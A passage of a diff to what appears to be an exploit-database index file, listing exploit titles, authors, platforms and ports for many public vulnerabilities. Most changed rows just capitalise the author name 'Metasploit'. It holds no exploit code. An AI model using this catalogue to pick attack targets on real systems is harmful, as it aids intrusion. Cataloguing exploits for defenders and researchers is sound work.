Remote Code Execution",2013-06-05,metasploit,linux,remote,5555 +25975,platforms/linux/remote/25975.rb,"MiniUPnPd 1.0 - Stack Buffer Overflow Remote Code Execution",2013-06-05,Metasploit,linux,remote,5555 25976,platforms/hardware/webapps/25976.txt,"DS3 - Authentication Server - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",hardware,webapps,0 25977,platforms/jsp/webapps/25977.txt,"Imperva SecureSphere Operations Manager 9.0.0.5 - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",jsp,webapps,0 25978,platforms/hardware/webapps/25978.txt,"Netgear DGN1000 / DGN2200 - Multiple Vulnerabilities",2013-06-05,"Roberto Paleari",hardware,webapps,80 -25979,platforms/windows/remote/25979.rb,"Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution",2013-06-05,metasploit,windows,remote,0 -25980,platforms/multiple/remote/25980.rb,"Apache Struts - includeParams Remote Code Execution",2013-06-05,metasploit,multiple,remote,8080 +25979,platforms/windows/remote/25979.rb,"Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution",2013-06-05,Metasploit,windows,remote,0 +25980,platforms/multiple/remote/25980.rb,"Apache Struts - includeParams Remote Code Execution",2013-06-05,Metasploit,multiple,remote,8080 25981,platforms/asp/webapps/25981.txt,"Hosting Controller 6.1 - Multiple SQL Injection Vulnerabilities",2005-07-13,"Soroush Dalili",asp,webapps,0 25982,platforms/cfm/webapps/25982.txt,"Simple Message Board 2.0 beta1 Forum.CFM Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0 25983,platforms/cfm/webapps/25983.txt,"Simple Message Board 2.0 beta1 User.CFM Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0 @@ -23153,7 +23153,7 @@ id,file,description,date,author,platform,type,port 26296,platforms/php/webapps/26296.txt,"PHPMyFAQ 1.5.1 - Local File Include",2005-08-23,rgod,php,webapps,0 26009,platforms/php/webapps/26009.txt,"AfterLogic WebMail Lite PHP 7.0.1 - CSRF",2013-06-07,"Pablo Ribeiro",php,webapps,0 26010,platforms/windows/dos/26010.py,"Quick TFTP Server 2.2 - Denial of Service",2013-06-07,npn,windows,dos,0 -26012,platforms/windows/remote/26012.rb,"Novell Zenworks Mobile Device Managment Local File Inclusion",2013-06-07,metasploit,windows,remote,80 +26012,platforms/windows/remote/26012.rb,"Novell Zenworks Mobile Device Managment Local File Inclusion",2013-06-07,Metasploit,windows,remote,80 26013,platforms/multiple/remote/26013.txt,"Oracle Forms 10g/ 6i/9i/4.5.10/5.0/6.0.8 Services Unauthorized Form Execution",2005-07-19,"Alexander Kornbrust",multiple,remote,0 26014,platforms/php/webapps/26014.txt,"FForm Sender 1.0 Processform.php3 Name Cross-Site Scripting",2005-07-19,rgod,php,webapps,0 26015,platforms/php/webapps/26015.txt,"Form Sender 1.0 Processform.php3 Failed Cross-Site Scripting",2005-07-19,rgod,php,webapps,0 @@ -23278,8 +23278,8 @@ id,file,description,date,author,platform,type,port 26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 (x86_64) - perf_swevent_init Local Root Exploit (2)",2013-06-11,"Andrea Bittau",linux,local,0 26132,platforms/php/webapps/26132.txt,"Fobuc Guestbook 0.9 - SQL Injection",2013-06-11,"CWH Underground",php,webapps,0 26133,platforms/windows/dos/26133.py,"Sami FTP Server 2.0.1 - RETR Denial of Service",2013-06-11,Chako,windows,dos,21 -26134,platforms/windows/remote/26134.rb,"Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow",2013-06-11,metasploit,windows,remote,0 -26135,platforms/multiple/remote/26135.rb,"Java Applet Driver Manager Privileged toString() Remote Code Execution",2013-06-11,metasploit,multiple,remote,0 +26134,platforms/windows/remote/26134.rb,"Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow",2013-06-11,Metasploit,windows,remote,0 +26135,platforms/multiple/remote/26135.rb,"Java Applet Driver Manager Privileged toString() Remote Code Execution",2013-06-11,Metasploit,multiple,remote,0 26136,platforms/php/webapps/26136.txt,"Simple PHP Agenda 2.2.8 (edit_event.php eventid param) - SQL Injection",2013-06-11,"Anthony Dubuissez",php,webapps,0 26137,platforms/windows/dos/26137.py,"Syslog Server 1.2.3 - Crash PoC",2013-06-12,npn,windows,dos,0 26138,platforms/hardware/dos/26138.txt,"Ubiquiti airCam RTSP Service 1.1.5 - Buffer Overflow",2013-06-12,"Core Security",hardware,dos,554 @@ -23319,7 +23319,7 @@ id,file,description,date,author,platform,type,port 26172,platforms/php/webapps/26172.txt,"Mantis 0.x/1.0 - Multiple Input Validation Vulnerabilities",2005-08-19,anonymous,php,webapps,0 26173,platforms/windows/dos/26173.txt,"AXIS Media Control 6.2.10.11 - Unsafe ActiveX Method",2013-06-13,"Javier Repiso Sánchez",windows,dos,0 26174,platforms/hardware/webapps/26174.txt,"Airlive IP Cameras - Multiple Vulnerabilities",2013-06-13,"Sánchez, Lopez, Castillo",hardware,webapps,0 -26175,platforms/windows/remote/26175.rb,"Microsoft Internet Explorer - COALineDashStyleArray Integer Overflow (MS13-009)",2013-06-13,metasploit,windows,remote,0 +26175,platforms/windows/remote/26175.rb,"Microsoft Internet Explorer - COALineDashStyleArray Integer Overflow (MS13-009)",2013-06-13,Metasploit,windows,remote,0 26176,platforms/php/webapps/26176.txt,"Woltlab Burning Board 2.x ModCP.php SQL Injection",2005-08-20,[R],php,webapps,0 26177,platforms/php/webapps/26177.txt,"Land Down Under 800/801 links.php w Parameter SQL Injection",2005-08-20,bl2k,php,webapps,0 26178,platforms/php/webapps/26178.txt,"Land Down Under 800/801 journal.php m Parameter SQL Injection",2005-08-20,bl2k,php,webapps,0 @@ -23543,11 +23543,11 @@ id,file,description,date,author,platform,type,port 26415,platforms/hardware/webapps/26415.txt,"Linksys X3000 1.0.03 build 001 - Multiple Vulnerabilities",2013-06-24,m-1-k-3,hardware,webapps,0 26416,platforms/php/webapps/26416.txt,"Elemata CMS RC3.0 (global.php id param) - SQL Injection",2013-06-24,"CWH Underground",php,webapps,0 26827,platforms/php/webapps/26827.txt,"QuickPayPro 3.1 popups.edit.php popupid Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 -26418,platforms/windows/local/26418.rb,"Novell Client 4.91 SP4 - nwfs.sys Local Privilege Escalation",2013-06-24,metasploit,windows,local,0 -26419,platforms/linux/remote/26419.rb,"ZPanel 10.0.0.2 htpasswd Module Username Command Execution",2013-06-24,metasploit,linux,remote,0 -26420,platforms/windows/remote/26420.rb,"HP System Management Homepage JustGetSNMPQueue Command Injection",2013-06-24,metasploit,windows,remote,2381 -26421,platforms/php/remote/26421.rb,"LibrettoCMS File Manager - Arbitrary File Upload",2013-06-24,metasploit,php,remote,0 -26422,platforms/linux/remote/26422.rb,"MoinMoin - twikidraw Action Traversal File Upload",2013-06-24,metasploit,linux,remote,0 +26418,platforms/windows/local/26418.rb,"Novell Client 4.91 SP4 - nwfs.sys Local Privilege Escalation",2013-06-24,Metasploit,windows,local,0 +26419,platforms/linux/remote/26419.rb,"ZPanel 10.0.0.2 htpasswd Module Username Command Execution",2013-06-24,Metasploit,linux,remote,0 +26420,platforms/windows/remote/26420.rb,"HP System Management Homepage JustGetSNMPQueue Command Injection",2013-06-24,Metasploit,windows,remote,2381 +26421,platforms/php/remote/26421.rb,"LibrettoCMS File Manager - Arbitrary File Upload",2013-06-24,Metasploit,php,remote,0 +26422,platforms/linux/remote/26422.rb,"MoinMoin - twikidraw Action Traversal File Upload",2013-06-24,Metasploit,linux,remote,0 26423,platforms/php/webapps/26423.txt,"Mantis 0.19.2/1.0 Bug_sponsorship_list_view_inc.php File Include",2005-10-26,"Andreas Sandblad",php,webapps,0 26424,platforms/windows/remote/26424.txt,"Snoopy 0.9x/1.0/1.2 - Arbitrary Command Execution",2005-10-26,"D. Fabian",windows,remote,0 26425,platforms/php/webapps/26425.pl,"Woltlab 1.1/2.x Info-DB Info_db.php Multiple SQL Injection Vulnerabilities",2005-10-26,admin@batznet.com,php,webapps,0 @@ -23576,10 +23576,10 @@ id,file,description,date,author,platform,type,port 26448,platforms/windows/local/26448.py,"AudioCoder 0.8.22 - (.lst) Direct Retn Buffer Overflow",2013-06-26,Onying,windows,local,0 26449,platforms/php/webapps/26449.txt,"e107 Advanced Medal System Plugin - SQL Injection",2013-06-26,"Life Wasted",php,webapps,0 26450,platforms/windows/dos/26450.pl,"Baby FTP Server 1.24 - Denial of Service",2013-06-26,Chako,windows,dos,21 -26451,platforms/linux/local/26451.rb,"ZPanel zsudo - Local Privilege Escalation Exploit",2013-06-26,metasploit,linux,local,0 -26452,platforms/win_x86/local/26452.rb,"Novell Client 2 SP3 - nicm.sys Local Privilege Escalation",2013-06-26,metasploit,win_x86,local,0 +26451,platforms/linux/local/26451.rb,"ZPanel zsudo - Local Privilege Escalation Exploit",2013-06-26,Metasploit,linux,local,0 +26452,platforms/win_x86/local/26452.rb,"Novell Client 2 SP3 - nicm.sys Local Privilege Escalation",2013-06-26,Metasploit,win_x86,local,0 26453,platforms/php/webapps/26453.py,"PHP Charts 1.0 (index.php type param) - Remote Code Execution",2013-06-26,infodox,php,webapps,0 -26454,platforms/freebsd/local/26454.rb,"FreeBSD 9 - Address Space Manipulation Privilege Escalation",2013-06-26,metasploit,freebsd,local,0 +26454,platforms/freebsd/local/26454.rb,"FreeBSD 9 - Address Space Manipulation Privilege Escalation",2013-06-26,Metasploit,freebsd,local,0 26455,platforms/php/webapps/26455.txt,"VUBB Index.php Cross-Site Scripting",2005-11-01,"Alireza Hassani",php,webapps,0 26456,platforms/php/webapps/26456.txt,"XMB Forum 1.9.3 Post.php SQL Injection",2005-11-01,almaster,php,webapps,0 26457,platforms/windows/dos/26457.txt,"Microsoft Internet Explorer 6.0 - Malformed HTML Parsing Denial of Service (1)",2005-11-01,ad@class101.org,windows,dos,0 @@ -23605,11 +23605,11 @@ id,file,description,date,author,platform,type,port 26478,platforms/php/webapps/26478.txt,"Invision Power Services Invision Board 2.1 admin.php Multiple Parameter XSS",2005-11-07,benjilenoob,php,webapps,0 26479,platforms/windows/local/26479.txt,"Zone Labs Zone Alarm 6.0 Advance Program Control Bypass Weakness",2005-11-07,Tr0y-x,windows,local,0 26480,platforms/php/webapps/26480.txt,"toendaCMS 0.6.1 Admin.php Directory Traversal",2005-11-07,"Bernhard Mueller",php,webapps,0 -26481,platforms/php/webapps/26481.txt,"PHPList Mailing List Manager 2.x /admin/admin.php id Parameter SQL Injection",2005-11-07,"Tobias Klein",php,webapps,0 -26482,platforms/php/webapps/26482.txt,"PHPList Mailing List Manager 2.x /admin/editattributes.php id Parameter SQL Injection",2005-11-07,"Tobias Klein",php,webapps,0 -26483,platforms/php/webapps/26483.txt,"PHPList Mailing List Manager 2.x /admin/eventlog.php Multiple Parameter XSS",2005-11-07,"Tobias Klein",php,webapps,0 -26484,platforms/php/webapps/26484.txt,"PHPList Mailing List Manager 2.x /admin/configure.php id Parameter XSS",2005-11-07,"Tobias Klein",php,webapps,0 -26485,platforms/php/webapps/26485.txt,"PHPList Mailing List Manager 2.x /admin/users.php find Parameter XSS",2005-11-07,"Tobias Klein",php,webapps,0 +26481,platforms/php/webapps/26481.txt,"PHPList Mailing List Manager 2.x - /admin/admin.php id Parameter SQL Injection",2005-11-07,"Tobias Klein",php,webapps,0 +26482,platforms/php/webapps/26482.txt,"PHPList Mailing List Manager 2.x - /admin/editattributes.php id Parameter SQL Injection",2005-11-07,"Tobias Klein",php,webapps,0 +26483,platforms/php/webapps/26483.txt,"PHPList Mailing List Manager 2.x - /admin/eventlog.php Multiple Parameter XSS",2005-11-07,"Tobias Klein",php,webapps,0 +26484,platforms/php/webapps/26484.txt,"PHPList Mailing List Manager 2.x - /admin/configure.php id Parameter XSS",2005-11-07,"Tobias Klein",php,webapps,0 +26485,platforms/php/webapps/26485.txt,"PHPList Mailing List Manager 2.x - /admin/users.php find Parameter XSS",2005-11-07,"Tobias Klein",php,webapps,0 26486,platforms/php/webapps/26486.txt,"SAP Web Application Server 6.x/7.0 Error Page XSS",2005-11-09,"Leandro Meiners",php,webapps,0 26487,platforms/php/webapps/26487.txt,"SAP Web Application Server 6.x/7.0 frameset.htm sap-syscmd Parameter XSS",2005-11-09,"Leandro Meiners",php,webapps,0 26488,platforms/php/webapps/26488.txt,"SAP Web Application Server 6.x/7.0 URI Redirection",2005-11-09,"Leandro Meiners",php,webapps,0 @@ -23653,7 +23653,7 @@ id,file,description,date,author,platform,type,port 26526,platforms/windows/dos/26526.py,"VLC Media Player 2.0.7 - (.png) Crash PoC",2013-07-01,"Kevin Fujimoto",windows,dos,0 26527,platforms/hardware/webapps/26527.txt,"Barracuda SSL VPN 680Vx 2.3.3.193 - Multiple Script Injection Vulnerabilities",2013-07-01,LiquidWorm,hardware,webapps,0 26528,platforms/hardware/webapps/26528.txt,"Fortigate Firewalls - CSRF",2013-07-01,"Sven Wurth",hardware,webapps,0 -26529,platforms/multiple/remote/26529.rb,"Java Applet ProviderSkeleton Insecure Invoke Method",2013-07-01,metasploit,multiple,remote,0 +26529,platforms/multiple/remote/26529.rb,"Java Applet ProviderSkeleton Insecure Invoke Method",2013-07-01,Metasploit,multiple,remote,0 26530,platforms/php/webapps/26530.txt,"GLPI 0.83.9 - 'unserialize()' Function Remote Code Execution",2013-07-01,"Xavier Mehrenberger",php,webapps,0 26531,platforms/multiple/remote/26531.html,"Opera Web Browser 8.0/8.5 HTML Form Status Bar Misrepresentation",2005-11-16,Sverx,multiple,remote,0 26532,platforms/jsp/webapps/26532.txt,"Revize CMS Query_results.JSP SQL Injection",2005-11-17,Lostmon,jsp,webapps,0 @@ -23678,7 +23678,7 @@ id,file,description,date,author,platform,type,port 26551,platforms/cgi/webapps/26551.txt,"OTRS 2.0 - AgentTicketPlain Action Multiple Parameter SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0 26552,platforms/cgi/webapps/26552.txt,"OTRS 2.0 index.pl Multiple Parameter XSS",2005-11-22,"Moritz Naumann",cgi,webapps,0 26553,platforms/php/webapps/26553.txt,"Machform Form Maker 2 - Multiple Vulnerabilities",2013-07-02,"Yashar shahinzadeh",php,webapps,0 -26554,platforms/windows/local/26554.rb,"Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation",2013-07-02,metasploit,windows,local,0 +26554,platforms/windows/local/26554.rb,"Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation",2013-07-02,Metasploit,windows,local,0 26555,platforms/windows/dos/26555.txt,"Opera 12.15 vtable Corruption",2013-07-02,echo,windows,dos,0 26828,platforms/php/webapps/26828.txt,"QuickPayPro 3.1 customer.tickets.view.php Multiple Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 26557,platforms/windows/dos/26557.txt,"WinAmp 5.63 - Invalid Pointer Dereference",2013-07-02,"Julien Ahrens",windows,dos,0 @@ -23703,7 +23703,7 @@ id,file,description,date,author,platform,type,port 26576,platforms/php/webapps/26576.txt,"FreeForum 1.0/1.1 - Multiple SQL Injection Vulnerabilities",2005-11-23,r0t3d3Vil,php,webapps,0 28085,platforms/windows/local/28085.html,"KingView 6.53 - ActiveX Remote File Creation / Overwrite (KChartXY)",2013-09-04,blake,windows,local,0 26578,platforms/windows/dos/26578.py,"Realtek Sound Manager AvRack (.wav) - Crash PoC",2013-07-03,Asesino04,windows,dos,0 -26579,platforms/windows/local/26579.rb,"ABBS Audio Media Player .LST Buffer Overflow",2013-07-03,metasploit,windows,local,0 +26579,platforms/windows/local/26579.rb,"ABBS Audio Media Player .LST Buffer Overflow",2013-07-03,Metasploit,windows,local,0 26580,platforms/php/webapps/26580.txt,"SoftBiz Web Hosting Directory Script 1.1 - search_result.php cid Parameter SQL Injection",2005-11-24,r0t,php,webapps,0 26581,platforms/php/webapps/26581.txt,"SoftBiz Web Hosting Directory Script 1.1 review.php sbres_id Parameter SQL Injection",2005-11-24,r0t,php,webapps,0 26582,platforms/php/webapps/26582.txt,"SoftBiz Web Hosting Directory Script 1.1 browsecats.php cid Parameter SQL Injection",2005-11-24,r0t,php,webapps,0 @@ -23745,7 +23745,7 @@ id,file,description,date,author,platform,type,port 26618,platforms/php/webapps/26618.txt,"AllWeb Search 3.0 - SQL Injection",2005-11-28,r0t,php,webapps,0 26619,platforms/php/webapps/26619.txt,"K-Search 1.0 - SQL Injection Vulnerabilities",2005-11-28,r0t,php,webapps,0 26621,platforms/multiple/webapps/26621.txt,"Mobile Atlas Creator 1.9.12 - Persistent Command Injection",2013-07-05,Vulnerability-Lab,multiple,webapps,0 -26622,platforms/php/remote/26622.rb,"InstantCMS 1.6 - Remote PHP Code Execution",2013-07-05,metasploit,php,remote,0 +26622,platforms/php/remote/26622.rb,"InstantCMS 1.6 - Remote PHP Code Execution",2013-07-05,Metasploit,php,remote,0 26623,platforms/php/webapps/26623.txt,"Kasseler CMS 2 r1223 - Multiple Vulnerabilities",2013-07-05,"High-Tech Bridge SA",php,webapps,0 26624,platforms/php/webapps/26624.txt,"OpenX 2.8.10 - Multiple Vulnerabilities",2013-07-05,"High-Tech Bridge SA",php,webapps,0 26625,platforms/php/webapps/26625.txt,"EdmoBBS 0.9 - SQL Injection Vulnerabilities",2005-11-28,r0t,php,webapps,0 @@ -23831,7 +23831,7 @@ id,file,description,date,author,platform,type,port 26705,platforms/asp/webapps/26705.txt,"SiteBeater News 4.0 Archive.ASP Cross-Site Scripting",2005-12-03,r0t3d3Vil,asp,webapps,0 26706,platforms/php/webapps/26706.txt,"PHP-Fusion 6.0.109 Messages.php SQL Injection",2005-12-03,"Nolan West",php,webapps,0 26707,platforms/php/webapps/26707.txt,"Alisveristr E-commerce Login Multiple SQL Injection Vulnerabilities",2005-12-03,B3g0k,php,webapps,0 -26708,platforms/windows/local/26708.rb,"ERS Viewer 2013 ERS File Handling Buffer Overflow",2013-07-09,metasploit,windows,local,0 +26708,platforms/windows/local/26708.rb,"ERS Viewer 2013 ERS File Handling Buffer Overflow",2013-07-09,Metasploit,windows,local,0 26709,platforms/lin_x86/local/26709.txt,"Solaris Recommended Patch Cluster 6/19 - Local Root on x86",2013-07-09,"Larry W. Cashdollar",lin_x86,local,0 26710,platforms/multiple/dos/26710.txt,"Apache CXF < 2.5.10 / 2.6.7 / 2.7.4 - Denial of Service",2013-07-09,"SEC Consult",multiple,dos,0 26713,platforms/php/webapps/26713.txt,"phpYellowTM 5.33 - search_result.php haystack Parameter SQL Injection",2005-12-03,r0t3d3Vil,php,webapps,0 @@ -23925,7 +23925,7 @@ id,file,description,date,author,platform,type,port 26802,platforms/hardware/dos/26802.py,"Tri-PLC Nano-10 r81 - Denial of Service",2013-07-13,Sapling,hardware,dos,0 27438,platforms/php/webapps/27438.txt,"Invision Power Services Invision Board 2.0.4 Calendar Action Multiple Parameter XSS",2006-03-17,Mr.SNAKE,php,webapps,0 26804,platforms/php/webapps/26804.txt,"WordPress Spicy Blogroll Plugin - File Inclusion",2013-07-13,Ahlspiess,php,webapps,0 -26805,platforms/windows/local/26805.rb,"Corel PDF Fusion Stack Buffer Overflow",2013-07-13,metasploit,windows,local,0 +26805,platforms/windows/local/26805.rb,"Corel PDF Fusion Stack Buffer Overflow",2013-07-13,Metasploit,windows,local,0 26806,platforms/asp/webapps/26806.txt,"BMC Service Desk Express 10.2.1.95 - Multiple Vulnerabilities",2013-07-13,"Nuri Fattah",asp,webapps,0 26807,platforms/windows/webapps/26807.txt,"McAfee ePO 4.6.6 - Multiple Vulnerabilities",2013-07-13,"Nuri Fattah",windows,webapps,0 26808,platforms/php/webapps/26808.txt,"McGallery 1.0/1.1/2.2 index.php language Parameter Traversal Local File Inclusion",2005-12-13,r0t,php,webapps,0 @@ -24132,8 +24132,8 @@ id,file,description,date,author,platform,type,port 27009,platforms/php/webapps/27009.txt,"MLM (Multi Level Marketing) Script - Multiple Vulnerabilities",2013-07-22,3spi0n,php,webapps,0 27010,platforms/windows/dos/27010.txt,"VbsEdit 5.9.3 - (.smi) Buffer Overflow",2013-07-22,d3b4g,windows,dos,0 27011,platforms/jsp/webapps/27011.txt,"Sybase EAServer 6.3.1 - Multiple Vulnerabilities",2013-07-22,"SEC Consult",jsp,webapps,0 -27012,platforms/windows/remote/27012.rb,"Apple Quicktime 7 Invalid Atom Length Buffer Overflow",2013-07-22,metasploit,windows,remote,0 -27013,platforms/windows/remote/27013.rb,"HP Managed Printing Administration jobAcct Remote Command Execution",2013-07-22,metasploit,windows,remote,0 +27012,platforms/windows/remote/27012.rb,"Apple Quicktime 7 Invalid Atom Length Buffer Overflow",2013-07-22,Metasploit,windows,remote,0 +27013,platforms/windows/remote/27013.rb,"HP Managed Printing Administration jobAcct Remote Command Execution",2013-07-22,Metasploit,windows,remote,0 27015,platforms/php/webapps/27015.txt,"Chipmunk Guestbook 1.4 Homepage HTML Injection",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 27016,platforms/php/webapps/27016.txt,"Chimera Web Portal 0.2 modules.php Multiple Parameter XSS",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 27017,platforms/php/webapps/27017.txt,"Chimera Web Portal 0.2 linkcategory.php id Parameter SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24167,9 +24167,9 @@ id,file,description,date,author,platform,type,port 27041,platforms/windows/local/27041.pl,"Super Player 3500 - (.m3u) Local Stack Based Buffer Overflow",2013-07-23,jun,windows,local,0 27042,platforms/ios/webapps/27042.txt,"Photo Server 2.0 iOS - Multiple Vulnerabilities",2013-07-23,Vulnerability-Lab,ios,webapps,0 27043,platforms/hardware/dos/27043.py,"Samsung PS50C7700 TV - Denial of Service",2013-07-23,"Malik Mesellem",hardware,dos,5600 -27044,platforms/hardware/remote/27044.rb,"D-Link Devices UPnP SOAP Command Execution",2013-07-23,metasploit,hardware,remote,0 -27045,platforms/linux/remote/27045.rb,"Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection",2013-07-23,metasploit,linux,remote,443 -27046,platforms/windows/remote/27046.rb,"VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload",2013-07-23,metasploit,windows,remote,443 +27044,platforms/hardware/remote/27044.rb,"D-Link Devices UPnP SOAP Command Execution",2013-07-23,Metasploit,hardware,remote,0 +27045,platforms/linux/remote/27045.rb,"Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection",2013-07-23,Metasploit,linux,remote,443 +27046,platforms/windows/remote/27046.rb,"VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload",2013-07-23,Metasploit,windows,remote,443 27047,platforms/windows/dos/27047.txt,"Artweaver 3.1.5 - (.awd) Buffer Overflow",2013-07-23,"Core Security",windows,dos,0 27048,platforms/php/webapps/27048.txt,"AppServ Open Project 2.4.5 - Remote File Include",2006-01-09,Xez,php,webapps,0 27049,platforms/windows/dos/27049.txt,"XnView 2.03 - (.pct) Buffer Overflow",2013-07-23,"Core Security",windows,dos,0 @@ -24189,7 +24189,7 @@ id,file,description,date,author,platform,type,port 27063,platforms/asp/webapps/27063.txt,"WebWiz Forums Search_form.ASP Cross-Site Scripting",2006-01-10,nukedx,asp,webapps,0 27064,platforms/php/webapps/27064.txt,"Orjinweb Index.php Remote File Include",2006-01-10,serxwebun,php,webapps,0 27065,platforms/linux/local/27065.txt,"Cray UNICOS /usr/bin/script Command Line Argument Local Overflow",2006-01-10,"Micheal Turner",linux,local,0 -27066,platforms/linux/local/27066.txt,"Cray UNICOS /etc/nu -c Option Filename Processing Local Overflow",2006-01-10,"Micheal Turner",linux,local,0 +27066,platforms/linux/local/27066.txt,"Cray UNICOS /etc/nu - -c Option Filename Processing Local Overflow",2006-01-10,"Micheal Turner",linux,local,0 27067,platforms/php/webapps/27067.txt,"MyPHPim calendar.php3 cal_id Parameter SQL Injection",2006-01-11,"Aliaksandr Hartsuyeu",php,webapps,0 27068,platforms/php/webapps/27068.txt,"MyPHPim Login Page pass Field SQL Injection",2006-01-11,"Aliaksandr Hartsuyeu",php,webapps,0 27069,platforms/windows/dos/27069.txt,"Apple QuickTime 6.4/6.5/7.0.x PictureViewer JPEG/PICT File Buffer Overflow",2006-01-11,"Dennis Rand",windows,dos,0 @@ -24257,7 +24257,7 @@ id,file,description,date,author,platform,type,port 27132,platforms/hardware/shellcode/27132.txt,"MIPS - (Little Endian) system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",hardware,shellcode,0 27133,platforms/mips/remote/27133.py,"ASUS RT-AC66U acsd Param - Remote Root Shell Exploit",2013-07-27,"Jacob Holcomb",mips,remote,0 27134,platforms/hardware/webapps/27134.pl,"Broadkam PJ871 - Authentication Bypass",2013-07-27,d3c0der,hardware,webapps,0 -27135,platforms/multiple/remote/27135.rb,"Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution",2013-07-27,metasploit,multiple,remote,8080 +27135,platforms/multiple/remote/27135.rb,"Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution",2013-07-27,Metasploit,multiple,remote,8080 27136,platforms/php/webapps/27136.txt,"Symantec Web Gateway 5.1.0.x - Multiple Vulnerabilities",2013-07-27,"SEC Consult",php,webapps,0 27137,platforms/php/webapps/27137.txt,"MyBB 1.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-26,imei,php,webapps,0 27138,platforms/php/webapps/27138.txt,"AndoNET Blog 2004.9.2 Comentarios.php SQL Injection",2006-01-26,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24401,7 +24401,7 @@ id,file,description,date,author,platform,type,port 27275,platforms/php/webapps/27275.txt,"FunGamez Remote File Upload",2013-08-02,"cr4wl3r ",php,webapps,0 27276,platforms/php/webapps/27276.html,"Bigace CMS 2.7.8 - Add Admin Account CSRF",2013-08-02,"Yashar shahinzadeh",php,webapps,0 27277,platforms/windows/remote/27277.py,"PCMAN FTP 2.07 - PASS Command Buffer Overflow",2013-08-02,Ottomatik,windows,remote,0 -27528,platforms/hardware/remote/27528.rb,"D-Link Devices - Unauthenticated Remote Command Execution (2)",2013-08-12,metasploit,hardware,remote,0 +27528,platforms/hardware/remote/27528.rb,"D-Link Devices - Unauthenticated Remote Command Execution (2)",2013-08-12,Metasploit,hardware,remote,0 27279,platforms/php/webapps/27279.txt,"vtiger CRM <= 5.4.0 (SOAP Services) - Multiple Vulnerabilities",2013-08-02,EgiX,php,webapps,0 27281,platforms/php/webapps/27281.txt,"Telmanik CMS Press 1.01b (pages.php page_name param) - SQL Injection",2013-08-02,"Anarchy Angel",php,webapps,0 27282,platforms/windows/local/27282.txt,"Agnitum Outpost Security Suite 8.1 - Privilege Escalation",2013-08-02,"Ahmad Moghimi",windows,local,0 @@ -24415,10 +24415,10 @@ id,file,description,date,author,platform,type,port 27290,platforms/php/webapps/27290.txt,"WordPress Plugin Better WP Security - Stored XSS",2013-08-02,"Richard Warren",php,webapps,0 27291,platforms/windows/webapps/27291.txt,"Oracle Hyperion 11 - Directory Traversal",2013-08-02,"Richard Warren",windows,webapps,19000 27292,platforms/windows/dos/27292.py,"EchoVNC Viewer Remote DoS",2013-08-02,Z3r0n3,windows,dos,0 -27293,platforms/php/remote/27293.rb,"PineApp Mail-SeCure test_li_connection.php Arbitrary Command Execution",2013-08-02,metasploit,php,remote,7443 -27294,platforms/php/remote/27294.rb,"PineApp Mail-SeCure ldapsyncnow.php Arbitrary Command Execution",2013-08-02,metasploit,php,remote,7443 -27295,platforms/unix/remote/27295.rb,"PineApp Mail-SeCure livelog.html Arbitrary Command Execution",2013-08-02,metasploit,unix,remote,7443 -27296,platforms/windows/local/27296.rb,"MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation",2013-08-02,metasploit,windows,local,0 +27293,platforms/php/remote/27293.rb,"PineApp Mail-SeCure test_li_connection.php Arbitrary Command Execution",2013-08-02,Metasploit,php,remote,7443 +27294,platforms/php/remote/27294.rb,"PineApp Mail-SeCure ldapsyncnow.php Arbitrary Command Execution",2013-08-02,Metasploit,php,remote,7443 +27295,platforms/unix/remote/27295.rb,"PineApp Mail-SeCure livelog.html Arbitrary Command Execution",2013-08-02,Metasploit,unix,remote,7443 +27296,platforms/windows/local/27296.rb,"MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation",2013-08-02,Metasploit,windows,local,0 27297,platforms/linux/local/27297.c,"Linux Kernel <= 3.7.6 (Redhat x86/x64) - 'MSR' Driver Local Privilege Escalation",2013-08-02,spender,linux,local,0 27298,platforms/php/webapps/27298.txt,"Web Calendar Pro Dropbase.php SQL Injection",2006-02-23,ReZEN,php,webapps,0 27299,platforms/php/webapps/27299.txt,"NOCC 1.0 error.php html_error_occurred Parameter XSS",2006-02-23,rgod,php,webapps,0 @@ -24542,9 +24542,9 @@ id,file,description,date,author,platform,type,port 27424,platforms/php/webapps/27424.txt,"DSDownload 1.0 - Multiple SQL-Injection Vulnerabilities",2006-03-15,"Aliaksandr Hartsuyeu",php,webapps,0 27425,platforms/linux/dos/27425.txt,"Zoo 2.10 - Parse.c Local Buffer Overflow",2006-03-16,"Josh Bressers",linux,dos,0 27427,platforms/php/webapps/27427.txt,"Contrexx CMS 1.0.x Index.php Cross-Site Scripting",2006-03-16,Soot,php,webapps,0 -27428,platforms/hardware/remote/27428.rb,"D-Link Devices - Unauthenticated Remote Command Execution (1)",2013-08-08,metasploit,hardware,remote,0 -27429,platforms/windows/remote/27429.rb,"Firefox onreadystatechange Event DocumentViewerImpl Use After Free",2013-08-08,metasploit,windows,remote,0 -27430,platforms/php/webapps/27430.txt,"PHPFox 3.6.0 (build3) Multiple SQL Injection Vulnerabilities",2013-08-08,"Matias Fontanini",php,webapps,0 +27428,platforms/hardware/remote/27428.rb,"D-Link Devices - Unauthenticated Remote Command Execution 